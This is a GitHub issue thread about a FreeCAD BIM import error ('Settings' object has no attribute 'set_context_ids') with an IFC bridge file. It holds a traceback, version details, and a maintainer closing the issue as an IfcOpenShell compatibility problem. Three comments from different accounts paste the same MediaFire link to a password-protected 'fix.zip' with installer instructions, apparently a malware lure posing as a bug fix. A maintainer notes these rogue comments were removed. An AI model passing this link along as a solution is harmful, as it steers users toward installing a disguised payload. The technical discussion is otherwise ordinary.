FreeCAD/FreeCAD #16065: 'Settings' object has no attribute 'set_context_ids'

Mannshoch, 2024-08-26:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

[image]
 - Imported File: http://www.ifcwiki.org/images/0/09/KIT-Bridge.zip

```
09:25:47  pyException: Traceback (most recent call last):
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_objects.py", line 136, in execute
    ifc_generator.generate_geometry(obj, cached=cached)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 77, in generate_geometry
    node, placement = generate_coin(ifcfile, elements, cached)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 234, in generate_coin
    iterator = get_geom_iterator(ifcfile, elements, brep_mode=False)
  File "/snap/freecad/1116/usr/Mod/BIM/nativeifc/ifc_generator.py", line 370, in get_geom_iterator
    settings.set_context_ids(body_contexts)
  File "/snap/freecad/1116/lib/python3.10/site-packages/ifcopenshell/geom/main.py", line 212, in __getattr__
    raise AttributeError("'Settings' object has no attribute '%s'" % k)
<class 'AttributeError'>: 'Settings' object has no attribute 'set_context_ids'
09:25:47  Default Site: 'Settings' object has no attribute 'set_context_ids'
09:25:47  Imported KIT-Bridge.ifc ( 1.75 Mb ) in 00:00
```

### Full version info

```shell
OS: Ubuntu Core 22 (ubuntu:GNOME/ubuntu)
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38516 (Git) Snap 1116
Build type: Release
Branch: main
Hash: 46a84da571d51b135e16ac4731baaf67c552d791
Python 3.10.12, Qt 5.15.10, Coin 4.0.0, Vtk 7.1.1, OCC 7.7.1
Locale: German/Switzerland (de_CH)
Installed mods: 
  * PieMenu 1.7.6
```

### Subproject(s) affected?

BIM

### Anything else?

Errors with other settings: https://github.com/FreeCAD/FreeCAD/issues/16064

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

maxwxyz, 2024-08-26:
@yorikvanhavre FYI

Roy-043, 2024-08-26:
I have removed some rogue comments.

Mannshoch, 2024-12-05:
With the Settings from the initial Post, no errors appear.

```
OS: Ubuntu Core 22 (ubuntu:GNOME/ubuntu-xorg/xcb)
Architecture: x86_64
Version: 1.1.0dev.39454 (Git) Snap 1216
Build type: Release
Branch: main
Hash: a97677ed2f0ee4875321f3043782cf77e3756cc6
Python 3.10.12, Qt 5.15.10, Coin 4.0.0, Vtk 7.1.1, OCC 7.7.1
Locale: German/Switzerland (de_CH)
Stylesheet/Theme/QtStyle: OpenDark.qss/OpenDark/Fusion
Installed mods: 
  * OpenTheme 2024.9.1
```

A full Import still presents Error:
https://github.com/FreeCAD/FreeCAD/issues/16064#issuecomment-2520384383

yorikvanhavre, 2024-12-06:
This file opens without issue for me too with 1.0. I think it might have been due to FreeCAD not being ready for IfcOpenShell 0.8 at that time...

I think we can close this?

closed 2024-12-06 by yorikvanhavre